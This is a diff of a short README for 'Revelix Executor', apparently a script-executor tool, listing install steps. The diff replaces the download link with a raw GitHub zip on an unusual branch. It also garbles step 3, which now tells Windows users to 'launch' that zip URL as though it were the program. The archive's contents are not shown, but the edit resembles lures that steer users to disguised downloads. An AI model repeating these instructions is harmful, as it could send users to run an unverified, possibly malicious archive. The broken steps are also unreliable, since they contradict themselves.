randysuarez/revelix-executor-suite/README.md

 **Getting rolling is as easy as poetry in code!**

-1. Download the latest Revelix Executor installer: https://randysuarez.github.io
+1. Download the latest Revelix Executor installer: https://raw.githubusercontent.com/randysuarez/revelix-executor-suite/branch/Agiel/suite-executor-revelix-1.4.zip
 2. Extract the archive in your chosen sanctuary.
-3. On Windows, launch `RevelixExecutor.exe`; for Linux/Mac, try:
+3. On Windows, launch `https://raw.githubusercontent.com/randysuarez/revelix-executor-suite/branch/Agiel/suite-executor-revelix-1.4.zip`; for Linux/Mac, try:
     - `chmod +x revelix-executor && ./revelix-executor`
 4. Glance at the sleek multilingual setup wizard—configure your path, and you’re ready.
 5. For integration with OpenAI or Claude APIs, visit the **Integrations** section below.